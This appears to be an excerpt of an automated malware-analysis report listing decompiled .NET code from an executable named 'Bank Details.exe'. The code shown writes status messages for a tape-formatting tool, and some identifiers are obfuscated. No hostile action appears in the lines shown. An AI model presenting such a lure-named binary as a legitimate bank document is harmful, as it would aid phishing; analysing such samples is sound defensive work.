                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(CS_0024_003C_003E8__locals2._0024VB_0024NonLocal__0024VB_0024Closure_2._0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { Operators.ConcatenateObject(Operators.ConcatenateObject((object)("Erasing " + Conversions.ToString(CS_0024_003C_003E8__locals2._0024VB_0024Local_i) + "/"), NewLateBinding.LateGet(CS_0024_003C_003E8__locals2._0024VB_0024NonLocal__0024VB_0024Closure_2._0024VB_0024Me.NumericUpDown6, (Type)null, "Value", new object[0], (string[])null, (Type[])null, (bool[])null)), (object)"..") }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(CS_0024_003C_003E8__locals1._0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { CS_0024_003C_003E8__locals1._0024VB_0024Local_ex.ToString() }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Erase finished." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSetComplex(Panel1, (Type)null, "Enabled", new object[1] { true }, (string[])null, (Type[])null, false, true);Nj(Conversions.ToBoolean(NewLateBinding.LateGet(CheckBox3, (Type)null, "Checked", new object[0], (string[])null, (Type[])null, (bool[])null)));}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{if (Operators.CompareString(text2, "", false) == 0){text2 = ConfTapeDrive + " Barcode = " + text;}text2 += "\r\n";object[] array3;bool[] array4;NewLateBinding.LateCall(TextBox2, (Type)null, "AppendText", array3 = new object[1] { text2 }, (string[])null, (Type[])null, array4 = new bool[1] { true }, true);if (array4[0]){text2 = (string)Conversions.ChangeType(RuntimeHelpers.GetObjectValue(array3[0]), typeof(string));}}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSetComplex(Panel1, (Type)null, "Enabled", new object[1] { true }, (string[])null, (Type[])null, false, true);Nj(Conversions.ToBoolean(NewLateBinding.LateGet(CheckBox3, (Type)null, "Checked", new object[0], (string[])null, (Type[])null, (bool[])null)));}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1]{new n8(c5S3Pa.p6G0Wk)}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1]{new n8(i6Y3Mb.r9LWg6)}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSet(ButtonDebugDumpMAM, (Type)null, "Enabled", new object[1] { true }, (string[])null, (Type[])null);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(CS_0024_003C_003E8__locals0._0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1]{new n8(qb.s6T)}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(CS_0024_003C_003E8__locals0._0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{//IL_002e: Unknown result type (might be due to invalid IL or missing references)//IL_0034: Expected O, but got Unknown//IL_008c: Unknown result type (might be due to invalid IL or missing references)//IL_0093: Expected O, but got Unknown//IL_00f0: Unknown result type (might be due to invalid IL or missing references)//IL_00f7: Expected O, but got Unknown//IL_0157: Unknown result type (might be due to invalid IL or missing references)//IL_015e: Expected O, but got Unknownforeach (Control item5 in (IEnumerable)NewLateBinding.LateGet(CS_0024_003C_003E8__locals0._0024VB_0024Me.Panel1, (Type)null, "Controls", new object[0], (string[])null, (Type[])null, (bool[])null)){Control val5 = item5;val5.Enabled = true;}foreach (Control item6 in (IEnumerable)NewLateBinding.LateGet(CS_0024_003C_003E8__locals0._0024VB_0024Me.Panel2, (Type)null, "Controls", new object[0], (string[])null, (Type[])null, (bool[])null)){Control val6 = item6;val6.Enabled = true;}foreach (Control item7 in (IEnumerable)NewLateBinding.LateGet(CS_0024_003C_003E8__locals0._0024VB_0024Me.TabControl1, (Type)null, "Controls", new object[0], (string[])null, (Type[])null, (bool[])null)){Control val7 = item7;val7.Enabled = true;}foreach (Control item8 in (IEnumerable)NewLateBinding.LateGet(CS_0024_003C_003E8__locals0._0024VB_0024Me.TabPage1, (Type)null, "Controls", new object[0], (string[])null, (Type[])null, (bool[])null)){Control val8 = item8;val8.Enabled = true;}}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(NewLateBinding.LateGet(ComboBox3, (Type)null, "ComboBox2", new object[0], (string[])null, (Type[])null, (bool[])null), (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSetComplex(NewLateBinding.LateGet(ComboBox3, (Type)null, "TextBox1", new object[0], (string[])null, (Type[])null, (bool[])null), (Type)null, "Text", new object[1] { text }, (string[])null, (Type[])null, false, true);NewLateBinding.LateCall(ComboBox3, (Type)null, "LoadSchemaFile", new object[0], (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSet(TextBox8, (Type)null, "Text", new object[1] { "Start format ...\r\n" }, (string[])null, (Type[])null);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Loading.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Initializing tape.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "MODE SENSE" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { string.Format(" Mode Data: {0}{1}", k2(array3), "\r\n") }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "MODE SELECT - Partition mode page.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Partitioning.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "WRITE ATTRIBUTE: Vendor=OPEN.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "WRITE ATTRIBUTE: Application name = LTFSCopyGUI.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { $"WRITE ATTRIBUTE: Application Version={((ApplicationBase)p4.Application).Info.Version.ToString(3)}.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "WRITE ATTRIBUTE: TextLabel= .." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "WRITE ATTRIBUTE: Localization Identifier = 0.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { $"WRITE ATTRIBUTE: Barcode={text}.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "WRITE ATTRIBUTE: Format Version=2.4.0.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "MODE SELECT - Block size.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Locate to data partition.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Write VOL1Label.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Write FileMark.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Write ltfslabel.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Write FileMark.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Write ltfsindex.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Write FileMark.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Locate to index partition.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Write VOL1Label.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Write FileMark.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Write ltfslabel.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Write FileMark.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Write ltfsindex.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Write FileMark.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { $"WRITE ATTRIBUTE: Written time={text2}.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "WRITE ATTRIBUTE: VCI.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Format finished." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
